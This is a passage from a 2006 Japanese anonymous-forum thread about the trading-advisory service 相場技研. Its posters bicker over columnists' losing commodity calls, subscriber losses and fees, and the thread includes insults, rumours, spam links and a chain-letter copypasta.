116 :名無しさん@大変な事がおきました:2006/09/20(水) 20:07:46 ID:6mAA5tzL
>>114
おまえみたいな、低脳を叩くのが面白いのよ。


117 :名無しさん@大変な事がおきました:2006/09/20(水) 20:09:02 ID:NBa8xWvO
なるほどね〜
こうして投稿者を挑発すればスレが流れていくからな〜
勝手にやってな、粘着君w
いや、新たな誘導君ww

工作ご苦労www

それとも大損したかな〜

頑張ってね〜w

118 :名無しさん@大変な事がおきました:2006/09/20(水) 20:12:14 ID:6mAA5tzL
スレが流れる?工作?なんだそりゃ?
誘導君?
こいつ、アタマおかしいだろ。
なにをいったい、勘違いしてるんだ?

で、結局アホをさらけ出して、逃走する>>117であった。
ワラタワラタ


119 :名無しさん@大変な事がおきました:2006/09/20(水) 20:13:02 ID:MXPowMMN
やれやれ困ったものだ。

一時期は我が世の春を謳歌していた執筆者たちが、
ここまで曲がって飛び寸前になってしまうと
スタッフ同士で、ついには個人攻撃の共食い仲間割れかよ。

もう少し、私心を捨てて相場を冷静に語れないものだろうか。

120 :名無しさん@大変な事がおきました:2006/09/20(水) 20:16:53 ID:dNp0XSme
>>119 相場が荒れると、人の心も荒むんでしょうね

121 :名無しさん@大変な事がおきました:2006/09/20(水) 20:16:59 ID:6mAA5tzL
>>119
だから、技研はアホだっての。
そんなとこで儲かると思っている客もアホだったわけ。
スタッフ同士の仲間割れが技研で起こったのか?
技研は崩壊か。


122 :名無しさん@大変な事がおきました:2006/09/20(水) 21:12:28 ID:MXPowMMN
一説によれば

主だったスタッフは近いうちに、浸水がひどくて沈没寸前の技研という船を
乗り捨てて、芳名録に乗り移るみたいだ。

だから間もなく、芳名録も読むのもポイント制にして有料化されるようだ。
芳名録は執筆者予備軍の宝の山、すなわち金のなる木なのさ。

秋山損師は現在の悲惨な状態を以前から予測していて、
芳名録で普段から入替え用の予想屋を訓練していたのさ。
そして、年明けには現執筆人のリハビリ訓練を終了して
知らん振りしてHNを変えて登場させるスケジュールかな。

しかし、盛大なる芳名録のメンバーは、味噌もクソも一緒だから
会員もしっかりと執筆者を厳しく選別しなくてはならないな。


123 :名無しさん@大変な事がおきました:2006/09/20(水) 21:51:19 ID:dNp0XSme
それ、本当ですか?
芳名録はピンキリですよね・・・


124 :名無しさん@大変な事がおきました:2006/09/20(水) 21:54:10 ID:EqV+bRON
芳名禄は基本的に日記だからオナニーカキコだっぽ。


125 :名無しさん@大変な事がおきました:2006/09/21(木) 00:00:33 ID:Kr3HpTyK
あーんさんガンバ

126 :名無しさん@大変な事がおきました:2006/09/21(木) 00:53:06 ID:QppaQlOZ
>>109
いや、おまえさんに言ったんだよ。

なんで猫なんだか、さっぱり理解に苦しむ

127 :名無しさん@大変な事がおきました:2006/09/21(木) 04:08:19 ID:BqJpD6Up
>>122
信用毀損罪
虚偽の風説を流布し、又は偽計を用いて、人の信用を毀損する犯罪である。
保護法益は人の経済的な評価とされており、信用とは経済的な意味での信用を意味する。
危険犯であり、現実に人の信用を低下させていなくても成立する。

業務妨害罪
虚偽の風説を流布し、又は偽計を用いて、人の業務を妨害すること。





128 :名無しさん@大変な事がおきました:2006/09/21(木) 07:37:02 ID:JJ9f/0+c
相場で負けても本業で食えるから、資金管理が甘いね。


129 :名無しさん@大変な事がおきました:2006/09/21(木) 09:42:08 ID:Y0okT9cl
その点、ゆうこ姫は必死だな。


130 :名無しさん@大変な事がおきました:2006/09/21(木) 09:48:08 ID:oZNp5dns
ゆうこさんの時代ですね
秋山さんやめてゆうこさんに提灯つけようかな

131 :買い方筆頭領主さま:2006/09/21(木) 09:54:01 ID:dmjZ35hl
なんだかわからんjけどがんばれーーー!!!


132 :Loop ◆pCagQ2VMTg :2006/09/21(木) 10:07:51 ID:xRcSjSGd
>秋山損師

♪そんしーそんしーそんしそんしそんしー、
あーきーやーまー、そんしー!

133 :名無しさん@大変な事がおきました:2006/09/21(木) 10:13:39 ID:Y0okT9cl
Loopへ告ぐ。
次にここに書き込みした、新スレ建てる。
以上。

134 :名無しさん@大変な事がおきました:2006/09/21(木) 14:55:24 ID:ouD5lwpe
また来てたんか!
金にも居てたよな〜


135 :名無しさん@大変な事がおきました:2006/09/21(木) 17:07:03 ID:O1cGaJEb
ゆうこはずっと好調なのか?
ネカマの噂もあるが、上手いんならいいか


136 :名無しさん@大変な事がおきました:2006/09/21(木) 17:09:14 ID:5fwNMk1w
ネカマに金払うのはどうかと

137 :名無しさん@大変な事がおきました:2006/09/21(木) 17:13:40 ID:O1cGaJEb
そうだね、面白そうではあるけど

昨日はここも荒れていたんだな
クラックロングだっけ、秋山さんは
コラム書いてる人達もそろそろ曲がりから復活するのかな?

138 :名無しさん@大変な事がおきました:2006/09/21(木) 18:49:44 ID:RXFuLFrQ
自作自演乙

139 :名無しさん@大変な事がおきました:2006/09/22(金) 14:59:38 ID:Tl/1CSYE
各執筆者の週末の収支報告が楽しみですな。

140 :名無しさん@大変な事がおきました:2006/09/22(金) 17:15:44 ID:ZBdyKB7C
獣王さんは緊急コラムとか、短期コラムとか連発してるな
そんなことよりゴムで復活してくれ!

141 :名無しさん@大変な事がおきました:2006/09/22(金) 19:15:50 ID:J6HdN6FF
獣王氏のこのコラム「白金上下のブレに惑わされるな。」
って自分が惑わされてるんじゃマイカ?

あっ!そうか!! 惑わされちゃったので 戒めのためのタイトルね


142 :名無しさん@大変な事がおきました:2006/09/23(土) 00:23:25 ID:ZhSFSKMI
あっきーの日記って…
やっぱバーチャだったのかよ………

143 :名無しさん@大変な事がおきました:2006/09/23(土) 09:38:52 ID:gb3SHNLL
秋山さんは疲れているのかね?

また粗糖がきつい下げだ


144 :名無しさん@大変な事がおきました:2006/09/23(土) 09:45:51 ID:Or1lxiTD
相場逆行、体調最悪。ついてないね、秋山氏は。

原因はあの車なんだって。前のオーナーを調べてみそ。
ついてるついてる。
あの壊れかけ中古外車を一日も早く処分しなければ。

145 :名無しさん@大変な事がおきました:2006/09/23(土) 09:55:57 ID:gb3SHNLL
獣王さんが不調なのは何が理由?

146 :名無しさん@大変な事がおきました:2006/09/23(土) 10:09:48 ID:Or1lxiTD

獣王氏不調の原因は、コラムの書きすぎ。



147 :名無しさん@大変な事がおきました:2006/09/23(土) 10:17:09 ID:Uwa9wO2G
>>144
そういう微妙なところから運気って変わっていくからね。いやいや。。。

でも、、今まで儲けていた人が軒並みやられているのが商品相場の現状だよ。
ここ2〜5年のヒストリカルデータで検証し組み立てていたトレーダーがかなり
負けている。とにかく買いで儲けてきた人が多いしね。だから今の状況は必然でしょう。
秋山さんが目立つけど、ほとんどやられてる。結局関係ないでしょう。

148 :名無しさん@大変な事がおきました:2006/09/23(土) 10:53:15 ID:Or1lxiTD
>>147ですね。

順風満帆だったものが何かを境に傾いてくるのは世の中の常。
そうなると、何をやってもうまくいかなくなる。というか
うまくいかなくなるものを引き寄せるようになる。

石油が上場から7年だっけ?貴金属も前の底から8年程度経過。
自前の手書き折れ線グラフは今年の5月が何かの転換に見える。
何か一息ついたように。

確か株は「上げ3年下げ7年の10年周期」らしいが
7000円から3年上げてピーク打ったと同時にトレーダーも消え始めた。
商品も世代交代の時期が来たのかもね。


149 :名無しさん@大変な事がおきました:2006/09/23(土) 10:58:40 ID:Or1lxiTD
だいたい、たった2〜3年のデータを基に売買するほうがおかしい。
せめて30年は調べないと。

おれは測候所が開設された、大正時代からのある気象データを持っている。

150 :名無しさん@大変な事がおきました:2006/09/23(土) 11:40:40 ID:Uwa9wO2G
>>149
まあみんなわかってはいるんだろうけど、体験すると全然別なんだよね。
やはり何度も体験しないと。。。秋山君とかはパラジウムや他の大相場も
乗り切っているしタフなほうだと思うけどね。上場してから10年未満
のものは今後どうなるかは全くわからないよね。それこそチューリップとか
小豆とか銀とか、とにかく今以上に考えられないとんでもない相場がいくつも
あったのは確かだし、、秋山君はそういうチャートを集めるのも趣味だからね
良く知ってると思う。だから鞘取りなんだろうね。それでもこれだけ曲がる。
すこしでも+になったら逃げる方式でもこれだ。やはり相場は甘くないよね。。


151 :名無しさん@大変な事がおきました:2006/09/23(土) 12:01:49 ID:Or1lxiTD
ある海外投資家が長期のデータを比較したら
「値段の前日比の上げ下げの確率と前日比の気温の上げ下げの確率の誤差は5%」だそうな。

つまり、相場も天気予報も
大して変わらないということだな。



152 :名無しさん@大変な事がおきました:2006/09/23(土) 12:37:59 ID:rJl5Rm+Q
なに、一人二役自作自演してるんだ?

153 :名無しさん@大変な事がおきました:2006/09/23(土) 13:00:12 ID:Uwa9wO2G
>>151
うんうんきいた事あるね。言い得て妙だよね。
明日の上げ下げを予測するのは無意味なわけだ。

まあテクニカルは予想や予測では無くて強弱とか需給や売買技法
がメインだし長期戦略もあるから全く無駄ではないけれどね。

俺はいつも思うけれども、相場観、大局観これ以上に重要なものは無いと思う。
そしてそれは教えられるものでもなく、当てるものでもなく、そのとおりに実行
出来るわけでもない。秋山さんほど色々経験している人も中々いないだろうけど
ただひとつ経験してない事があるとしたら絶望だ。

>>152
自演じゃないよ。

154 :名無しさん@大変な事がおきました:2006/09/23(土) 13:21:28 ID:rJl5Rm+Q
>>153
それは、申し訳ない。
ただ、技研ネタから外れないように。

155 :名無しさん@大変な事がおきました:2006/09/23(土) 14:07:19 ID:1TGKHgQ0
ID:rJl5Rm+Q

156 :名無しさん@大変な事がおきました:2006/09/23(土) 14:15:57 ID:8g2z4MgR
歓喜と恐怖(相場の二大要素) >> 秋山一億円スピード指数 >> 獣王人間観察

157 :名無しさん@大変な事がおきました:2006/09/23(土) 14:32:05 ID:4i4h8HuK
これからはゆうこ姫の天下です

158 :名無しさん@大変な事がおきました:2006/09/23(土) 14:49:36 ID:4i4h8HuK
やはりトレンドフォローの方が気分が楽でいいですよ

159 :名無しさん@大変な事がおきました:2006/09/23(土) 15:55:22 ID:SGlhSW7d

そねっち (2006/09/15(Fri) 23:23:02) 
一週間に一度位なら、方向性が見えてくるとは思います。
「初めからトレンドフォローに限定するという手もあるが、平時は日柄を見ながら逆張りするのが
一番パフォーマンスが良いんだよねぇ。」と、秋山氏の日記(9/4)にあるとおりです。
トレンドフォローだと、一年に一度位しか大きな波はとらえることができません。
「待つ」ことができるのであれば、 それも良し・・。

ぬは (2006/09/16(Sat) 21:23:49) 
結局みんな曲がってしまうのです。どうしてか?
じつはランダムを周期性向ありと思ってしまうからです。
というより信じたいのです。信じるものは救われ…ないのです。

ゆうこ (2006/09/17(Sun) 00:57:14) 
トレンドスパンによって、トレンドフォローとか逆張りとかの分類はないと想います
なぜなら そのトレンドスパンに応じた時間枠の足の使い分けすれば良いので・・・
短期売買に用いる最大の時間枠の足が、日足だと仮定した場合に
日足だけでは逆張りに見えてしまう線形も、120分足を使えばトレンドフォローになってるはずです
(なぜなら、ある部分の足で必ずトレンドフォローになっていないと、利益が派生しませんから)
ちなみに、わたしはデイトレでも、トレンドフォローです

秋山昇 (2006/09/17(Sun) 06:39:11) 
逆張り順張りは取引手法についての表現なので、ゆうこさんのおっしゃる通り、時間スケールは関係ありません




160 :magariya.org:2006/09/23(土) 17:06:17 ID:nlpqzd9x
http://members.goo.ne.jp/home/sayadori/

当たり屋はここだ!

161 :名無しさん@大変な事がおきました:2006/09/23(土) 17:27:04 ID:rt97HfZ7
しっ しっ

162 :名無しさん@大変な事がおきました:2006/09/23(土) 20:46:53 ID:lHg+yS2Z
>>153
名のある相場師の多くが、始めた頃に飛んで破産状態になっている
というのはよく聞く話。

秋山氏は飛びそうになったことはあるが
実際には一度も飛んでいないのが逆に弱点である、ということか。

163 :名無しさん@大変な事がおきました:2006/09/23(土) 21:07:43 ID:lFk2HUG6
獣王は数年前に一度dだことがあるから、現在は仮性包茎。
今回の大曲りで、ようやく一人前の男になりかけている。

秋山は未だにdだ経験してないから、包茎ということだ。
子供のころや大人になる前の成長過程で、一度も挫折を
経験してない優等生ほど、ケガが大きくなるのは常識。

普通の男は子供のころから、大なり小なり挫折を繰り返しながら、
一人前の大人に成長していくものだ。
秋山も実際のところ、今までの相場に対して、あまりにも順調すぎて
不満を持っていたかもしれない。
しかし、今回のたった一度の躓きだけで
大人になりきれるかどうかは保障の限りではない。



164 :名無しさん@大変な事がおきました:2006/09/23(土) 21:29:45 ID:4i4h8HuK
まさか秋山さんおたくじゃないですよね

165 :名無しさん@大変な事がおきました:2006/09/23(土) 21:58:00 ID:Tn4ouNmq
>>163
獣王個人はそれで良いかも知れないが、
獣王信じてついていって飛んだ会員はどうすんだよ。


166 :名無しさん@大変な事がおきました:2006/09/23(土) 22:19:14 ID:Uwa9wO2G
そうだね・・
なにを信じるにも大きなリスクがある。人でも物でも予想でも、見る目を養わなければならない。
そういう勉強になったということで納得するしかないんじゃないかなあ。俺も色んなものに何度も
何度も色んなものに騙されてきたよ。

それでもそいつらのせいにすることは無かった・・・自分の愚かさや甘さや不勉強は嘆いたけれど。
でも、おかげで気付いたよ。結局全部自分でやるしかないんだと。それ以外に成長の糧はないと・・


167 :名無しさん@大変な事がおきました:2006/09/23(土) 22:59:16 ID:lFk2HUG6
>>165
dだくらいで何だ? いのちまで取られやしないではないか。

信じるなら地獄の底まで信じてみろ、獣王だって必死で皮を剥いているんだ。
中途半端に人にぶら下がって相場を舐めるでないぞ。

第一だな、己の突っ張った皮の欲望を満たそうとして
他人を信じるなんて論外だろう。まして結果に対して大騒ぎ
するなんて、子供以下だな。クズだよ。
人生なんて、相場もそうだが自分で何度も何度も躓いて大怪我して
カラダで覚えるもんだよ。みずから学習するんだな。

168 :名無しさん@大変な事がおきました:2006/09/23(土) 23:03:52 ID:GEBHdME5
>>167
獣はずるいからなぁ。彼の懐は全くいたんでいないだろうよ

169 :名無しさん@大変な事がおきました:2006/09/23(土) 23:17:49 ID:PEZs6c4F
獣=ノミ行為in競馬

170 :名無しさん@大変な事がおきました:2006/09/23(土) 23:36:11 ID:Tn4ouNmq
>>167
その論法がいくら正しくても、飛んだ会員に通用するとでも思ってるんか?

171 :名無しさん@大変な事がおきました:2006/09/23(土) 23:42:16 ID:PEZs6c4F
>>170
獣=義理と人情の極道in広島

172 :名無しさん@大変な事がおきました:2006/09/23(土) 23:59:40 ID:lFk2HUG6
>>170
こと相場に関してだが、通用するしないなんぞはクソ食らえだ。
飛ぶ、飛ばないはオメーの自由だよ。
よく自分で考えてみろ、思考能力があればだ、がな。

173 :名無しさん@大変な事がおきました:2006/09/24(日) 00:07:08 ID:PSIsHkXx
>>172
顧問利用して飛ぶ飛ばないは自由だ?
なんだそりゃ
顧問信じて提灯付けるからこそ顧問を利用するわけだろが。
客が曲がれば顧問のせいっていうのが普通の論法だろうが。

174 :名無しさん@大変な事がおきました:2006/09/24(日) 00:17:40 ID:aImAQlmU
>>172
国民全員が利用できるインフラとして、銀行金利は年0.01%

欲ボケの常識は、世間の非常識

175 :名無しさん@大変な事がおきました:2006/09/24(日) 00:18:16 ID:MCyO8M8k
>>173
アッハッハー  御目出度いヤツだなー

例えばだな、オメーが信じている顧問が死ねと言ったら死ぬのかよ。
都合が悪くなってくると、何でも他人の所為していると
いつまでたっても成長できねーぞ。

176 :名無しさん@大変な事がおきました:2006/09/24(日) 00:18:44 ID:aImAQlmU
訂正

>>173
国民全員が利用できるインフラとして、銀行金利は年0.01%

欲ボケの常識は、世間の非常識


177 :名無しさん@大変な事がおきました:2006/09/24(日) 00:19:43 ID:9R8E5Cuj
自分でケツも拭けないのに
人様におしえるなんざ傍ら痛いわ。

178 :名無しさん@大変な事がおきました:2006/09/24(日) 00:26:56 ID:VRfw65X8
>>177
メンツ潰された=ヒットマン派遣in玉取

179 :名無しさん@大変な事がおきました:2006/09/24(日) 00:46:34 ID:9R8E5Cuj
>>178
すみませんが意味が分かりません。

180 :名無しさん@大変な事がおきました:2006/09/24(日) 00:48:20 ID:PSIsHkXx
>>175話し飛びすぎ。
死ぬか生きるかを指示してもらうために顧問利用してねえし。
顧問の相場指針の言うこと聞くために顧問利用するじゃねえか。


181 :名無しさん@大変な事がおきました:2006/09/24(日) 00:54:42 ID:PSIsHkXx
金払って情報買ってるわけだよ。
その情報が悪かったら文句いいたくなるのは普通じゃねえか。
買った客が悪いなんてのは普通考えたっておかしいじゃねえか。

182 :名無しさん@大変な事がおきました:2006/09/24(日) 00:54:54 ID:MCyO8M8k
>>180
よほど飛ぶのが好きなようだな。
顧問イノチか?

右向けと言ったら右向く程度にして、飛ぶほどまでのめり込むなよ。
永久に乳離れできねーぞ。

183 :名無しさん@大変な事がおきました:2006/09/24(日) 00:55:11 ID:SFWLBL9e
>>180
戦後の愚民化教育+小泉上っ面改革の相乗効果

184 :名無しさん@大変な事がおきました:2006/09/24(日) 01:02:00 ID:MCyO8M8k
>>180
商品や情報、その他何でもだが、買う買わないのはオメーの自由だよ。
だけどな、結果が出る前の予想が結果的に外れたから
欠陥情報だと文句を言うのも大人げないだろ。
子供が駄々をこねるのと同じだぜ。早く大人になろうな。


185 :名無しさん@大変な事がおきました:2006/09/24(日) 01:13:13 ID:PTJU08ae
>>184
いや、欠陥商品に「欠陥だ!」というのはまともだと思うぞ

186 :名無しさん@大変な事がおきました:2006/09/24(日) 01:26:08 ID:MCyO8M8k
それほど、地球の未来や自分の将来を知りたいのなら
おみくじでも買うんだな。

しかし、外れたら神様にも因縁つけるのか?

187 :名無しさん@大変な事がおきました:2006/09/24(日) 01:30:44 ID:PSIsHkXx
>>182
命?何それ。
顧問に提灯付けるために顧問利用してるのさ。
>>184
買って利用したあとに欠陥かわかるんだろが。
それが欠陥だっていうのは普通だろ。

188 :名無しさん@大変な事がおきました:2006/09/24(日) 01:46:44 ID:80/UgtRr
そういうことだ。 株でも商品でも為替でもいいが、今いる顧問誰でもいい。
一番パフォーマンスがいい顧問に提灯をつけるだけで儲かるとする。

それがどれだけ続くと思う? 続かんよ。 もって2〜3年。当たらなくなったら辞めればいいだって?

辞めれないよ。 それまでの儲けた記憶が物凄い残像になる。 そして打ちのめされるが今度は自分でやって
もっと打ちのめされるんだ。

そこでやっと気付くなんていう場合もあるんじゃないかな。

まあ、儲けている人稼いでいる人ほど顧問など全く利用していないことは明らかだ。
それだけは真実だ

189 :Loop ◆pCagQ2VMTg :2006/09/24(日) 05:36:55 ID:iNHy9+PM
技研は「比較的」健全な顧問ですが、ちょうちん論、顧問論としては同感ですね。

わかりやすいところでは、競輪競馬の専門家の予想ってありますよね?
もし、当たり屋がいたとしたら、ちょうちんが付き、オッズが下がって、
結局、余計不利になるんですよ。

バクチの初歩の初歩ですよ。悪いけど。

190 :Loop ◆pCagQ2VMTg :2006/09/24(日) 05:38:45 ID:iNHy9+PM
そしてもっとも自分にとって競争相手、敵なのは、
同じちょうちんどうし、です。

それは、本能的にわかってるみたいだけど。ちょうちんのみなさんも。

まあ、ちょうちん研究ならまかせてください。サヤ研究はともかく。

191 :名無しさん@大変な事がおきました:2006/09/24(日) 07:08:01 ID:PSIsHkXx
>>190
次おまえが書いたら新スレ建てるぞ。

192 :名無しさん@大変な事がおきました:2006/09/24(日) 07:31:29 ID:7vS/3uaY
確かにな。
顧問が推奨すれば、その銘柄を言われたとおりやらなきゃならない。

実際やってみると、他の銘柄のほうが効率がよかったりする。

193 :名無しさん@大変な事がおきました:2006/09/24(日) 07:50:23 ID:6v2CqeMa
>>191
スレ乱発男の登場だな
おまえ自身が技研を語れよ
それができないから、愚劣なことをやっているのだろう

194 :名無しさん@大変な事がおきました:2006/09/24(日) 07:59:43 ID:6v2CqeMa
Loopに粘着している技研会員スレ主の火ダルマ・ループ


173 名前:名無しさん@大変な事がおきました[] 投稿日:2006/09/24(日) 00:07:08 ID:PSIsHkXx
>>172
顧問利用して飛ぶ飛ばないは自由だ?
なんだそりゃ
顧問信じて提灯付けるからこそ顧問を利用するわけだろが。
客が曲がれば顧問のせいっていうのが普通の論法だろうが。
180 名前:名無しさん@大変な事がおきました[] 投稿日:2006/09/24(日) 00:48:20 ID:PSIsHkXx
>>175話し飛びすぎ。
死ぬか生きるかを指示してもらうために顧問利用してねえし。
顧問の相場指針の言うこと聞くために顧問利用するじゃねえか。
181 名前:名無しさん@大変な事がおきました[] 投稿日:2006/09/24(日) 00:54:42 ID:PSIsHkXx
金払って情報買ってるわけだよ。
その情報が悪かったら文句いいたくなるのは普通じゃねえか。
買った客が悪いなんてのは普通考えたっておかしいじゃねえか。
187 名前:名無しさん@大変な事がおきました[] 投稿日:2006/09/24(日) 01:30:44 ID:PSIsHkXx
>>182
命?何それ。
顧問に提灯付けるために顧問利用してるのさ。
>>184
買って利用したあとに欠陥かわかるんだろが。
それが欠陥だっていうのは普通だろ。
191 名前:名無しさん@大変な事がおきました[] 投稿日:2006/09/24(日) 07:08:01 ID:PSIsHkXx
>>190
次おまえが書いたら新スレ建てるぞ。


195 :名無しさん@大変な事がおきました:2006/09/24(日) 08:25:58 ID:YRaPAmj+
Loopネタは、やめろよ。
せっかくLoopがいなくなって元の技研スレになったと思いきや
Loopよ、おまえ空気読めよ。

196 :名無しさん@大変な事がおきました:2006/09/24(日) 08:29:00 ID:6v2CqeMa
↑ 愚鈍な間抜けの行動は、見栄見栄

197 :名無しさん@大変な事がおきました:2006/09/24(日) 09:24:50 ID:Ah2UVa2m
>>196
なに、俺に絡んでるんだ?俺の愚鈍な間抜けの行動ってなんだ?
俺は何もそんな間抜けな行動なんかしてないぞ。
今までLoopが来て荒れたのは現実だろ。だからLoopネタはやめろっていったわけだ。



198 :名無しさん@大変な事がおきました:2006/09/24(日) 09:35:13 ID:Ah2UVa2m
以上、Loopネタは終わり。

さて、技研のランキングポイントだがかなり落ちたね。
ガソリン、ゴム、粗糖がほぼ天井だった6〜7月ごろが獣王氏、秋山氏のポイントもピークだった。
そのころは、獣王氏で1,400,000P、秋山氏で1,000,000Pだった。
暴落相場と共に彼らのポイントも暴落するということは、それだけ彼らは逆張りで大曲りしたということだろう。

199 :名無しさん@大変な事がおきました:2006/09/24(日) 10:03:10 ID:80/UgtRr
まあここ2〜3年買っていれば儲かる相場だったから。
仕方ないと言えば仕方ないかもね。そのかわり俺はその時に
大儲けできなかったわけで

200 :名無しさん@大変な事がおきました:2006/09/24(日) 11:15:14 ID:Ah2UVa2m
会員が飛んで顧問が飛ばないって理不尽だよな。
資金力の違いだからとか、売買指示用の仮想売買だからとかで済まされるものか?
会員が飛ぶとき、顧問も一緒に飛べとまでは言えないけど。
結局、獣王氏も心機一転再スタートみたいな形でやってることは智也氏と同じだろ?
顧問だから、仮想上でも資金飛んでもやり続けなければいけないのはわかるけどね。
けどさ、資金飛ばしたので責任を取って辞めます。くらいの精神でやってほしいね。
自分の手張りと会員への指示が同じならば、信用がある程度は信用できるけどね。



201 :名無しさん@大変な事がおきました:2006/09/24(日) 11:23:23 ID:cIX13JVO
馬鹿だから顧問に頼る
馬鹿だから損失を放置する
馬鹿だからグチる
馬鹿だから生産性がない

以上

202 :名無しさん@大変な事がおきました:2006/09/24(日) 11:33:00 ID:q0gGGxOh
1コラム5000円は暴利だろ
はずれたら5000円返せよ

203 :名無しさん@大変な事がおきました:2006/09/24(日) 11:44:42 ID:Ah2UVa2m
>>201
確かにね。でも馬鹿って言う人がいる限り仕方ないのでは?
ノウハウ商売はこの世にいろんなものがあるからね。
究極言ってしまえば、馬鹿は相場張るなってことになるし。
>>202
ほとんどの執筆者は1週間当たり設定してるね。獣王氏は一発勝負指針で別コラムあるが。
一週間5000円だとして1ヵ月20,000円か。年間24万円。
年間24万以上も稼げない顧問っているのか?いたとしたらお笑いだな。
そうだとしたら、確かに暴利だ。


204 :名無しさん@大変な事がおきました:2006/09/24(日) 13:13:31 ID:WSr03Faa
元・会員だが獣王氏はゴムで飛ぶような事態に陥ったら
すっぱりと執筆辞めるって言ってなかったか?俺の勝手な勘違い???
今回の総括って、ゴムに関しては結局やり直しってことだろ???
追加入金はしないが、他の銘柄で儲けた分で充当ってことなのか?
ゴムで駄目になったら引退するなんてきっぱり言い切るとこが気に入って
いったん会員になったけど、なんか幻滅した・・・

205 :名無しさん@大変な事がおきました:2006/09/24(日) 14:41:48 ID:FlPtFtOz
>>204

それがほんとなら獣王は卑怯者決定だな。
「獣王」などというコテを付ける資格なし。

206 :名無しさん@大変な事がおきました:2006/09/24(日) 14:52:10 ID:PSIsHkXx
>>204
言ってた。
調子が良いときは血気盛んだった。
向かうやつは、ぬっ殺す!なんてわめいてたし。
時代劇仕立てのコラムで、獣王のことを殿!なんて呼んで遊んでたな。
金を返して欲しいよ。


207 :名無しさん@大変な事がおきました:2006/09/24(日) 14:56:43 ID:PSIsHkXx
>>204
飛んだらじゃなくて、
追い証が掛ったら、じゃなかったか?

208 :名無しさん@大変な事がおきました:2006/09/24(日) 15:26:25 ID:PSIsHkXx
なにもかも腹がたってきたよ。
提灯つけた俺が馬鹿だったで済まされたくないな。
提灯付けるためにコラム買ったんだから。
それから、ビーチリーっての、いい加減にしてほしい。
馴れ馴れしい口調で、獣ちん♪って獣王コラムでさ。
真剣にやれよって。


209 :名無しさん@大変な事がおきました:2006/09/24(日) 15:28:27 ID:xhqlXmnN
アリの巣コロリってあるじゃん。
蟻の行列にポンと置くと、一瞬ビックリして列が乱れる。
邪魔だなと言わんばかりに迂回する列が出来る。
そのうち好奇心旺盛な一匹がアリの巣コロリに入る。
そいつをマネして何匹も入る。
毒とも知らずにツブツブを運び出す。
一匹が一粒づつ。
いつのまにか行列はアリの巣コロリが折り返し地点になる。
黄色い粒と黒い蟻が作り出す模様は綺麗で見てて楽しい。
一匹が一粒づつ、丁寧にせっせと毒の粒を運ぶ。
せっせと、せっせと、せっせと、せっせと。
蟻さんって働き者だなと思う。
俺も頑張らなきゃなと思う。
次の日、あれほど沢山いて俺を困らせた蟻が一匹もいない。
ほんとにいない。
探してもいない。
泣きたくなった。





このレスを見た人は4日後にあなたの大切な人がいなくなるでしょう・・・・
それが嫌ならこのレスを5つの板にコピペしてください。
信じるか信じないかはあなた次第です。



210 :Loop ◆pCagQ2VMTg :2006/09/24(日) 15:48:21 ID:Qmc+bHT8
だとしたら、巣コロリ自体を運ばせるのが、目的である可能性もあります。

最初順玉で張ってローリングして行き、いつかはピークがあるのですから、
コラムが売れる量を指標にして、ピークと思われる地点で巣コロリ(反対玉)を置く。
それをせっせと買って戻るわけですから、
こっちは巣でじょじょに仕切る。
仕切るに従って、巣コロリの位置を下げて行く。

巣コロリ逆回転

コラム売れた金額をヘッジ用費用と見ながら、逆回転かますわけです。
ピーク時で上ブレークしたら、コラム代で時間稼ぐ。
ふつう下へ行くでしょう。非難ごうごうですが、大儲けです。

悪魔のワザですね。
そこまでやらんと勝てんものなのでしょう。

と、これはもちろんシミュレーションですが、使えるワザです。
次の未来のぎけん(別のぎけん)では、実際に実施もされるでしょう。
現在のぎけんは、もっとほんわかして、それほど悪どく無いと思います。けど、
考え付く有効なワザなら、必ず実際にあります、実施されます、
それが相場の原則です。

211 :名無しさん@大変な事がおきました:2006/09/24(日) 16:11:54 ID:+G3LW1VH
Loopはこっちに書き込め。
http://money4.2ch.net/test/read.cgi/deal/1156974327/l50

このスレはお前がウザいから建てたスレなんだよ。
>>1のテンプレ読めや。シミュレーションは他所でやれ。


212 :名無しさん@大変な事がおきました:2006/09/24(日) 16:51:28 ID:PSIsHkXx
>>211
同意です。

213 :magariya.org:2006/09/24(日) 17:10:42 ID:W7zvww9m
mixiで獣王さん見つけた。

214 :名無しさん@大変な事がおきました:2006/09/24(日) 17:20:34 ID:fDbqLKdf
相場技研
怪しい会社だ。(ワラ)
でも成り立ってるってことは、相場はってる人が顧問を頼りに
はってるってことですな?
5000円暴利っていうなら、顧問頼りにしないで、自分ではればいいのでは?
金返せっていうなら、最初からみなけりゃいい。
自分で見に行っといて、そりゃないぜ。せこいこというなら見なくてよし。
人って自分のせいにするのが嫌なんだな。

215 :名無しさん@大変な事がおきました:2006/09/24(日) 17:29:53 ID:UiQmapuN
騙される方が馬鹿なんだ!って、詐欺師が言ってたよ

216 :名無しさん@大変な事がおきました:2006/09/24(日) 17:37:07 ID:Ah2UVa2m
騙すつもりで執筆者もやってないでしょ。

217 :名無しさん@大変な事がおきました:2006/09/24(日) 17:46:35 ID:UiQmapuN
>>216
一般論ですよ。ここの事じゃありません

218 :magariya.org:2006/09/24(日) 19:00:08 ID:W7zvww9m
5000円だったら対面取引1枚の手数料だし、十分安いんじゃないの?

219 :名無しさん@大変な事がおきました:2006/09/24(日) 19:33:59 ID:yAewFRMs
おぉ…そぉ考えるとメチャメチャ安く感じるぞw(゚o゚)w

220 :magariya.org:2006/09/24(日) 19:39:36 ID:W7zvww9m
相場技研もいいけどmixiで私も無料で売買ポジション公開しているニダよ。
当てにされても困るけど。

やはり今はここがいちばん最強!
http://members.goo.ne.jp/home/sayadori/

221 :名無しさん@大変な事がおきました:2006/09/24(日) 20:03:18 ID:fZl5wKh0
Q師匠は自分の浮気も事も書いてますが、奥さんにばれないんでしょうか?

222 :名無しさん@大変な事がおきました:2006/09/24(日) 21:06:18 ID:PSIsHkXx
相変わらずマガリンの宣伝は醜い。
宣伝したくてうずうずしていて
やっと本性表した。
宣伝活動であちこちトラブルしてるやつ。
鞘取りのTOMMYさんのところでも以前に問題起こした。
相場で稼げないからアフェリエイトで稼ぐやつ。

223 :名無しさん@大変な事がおきました:2006/09/24(日) 21:23:48 ID:yAewFRMs
相場で曲がり屋の看板出してるのって
日本一まずいラーメン屋の看板と同じ感じ?

224 :名無しさん@大変な事がおきました:2006/09/24(日) 22:00:02 ID:5aAv3mO9
5000円だったらラーメンが10杯食えるぞ

225 :名無しさん@大変な事がおきました:2006/09/24(日) 22:57:55 ID:wgIAmDKc
masaも獣王同様に再出発か、、
次は誰だ?

226 :magariya.org:2006/09/24(日) 22:58:36 ID:W7zvww9m
サヤ取りのTOMMY???
意味不明だけど。
まあいっか。

Q神は離婚してます。

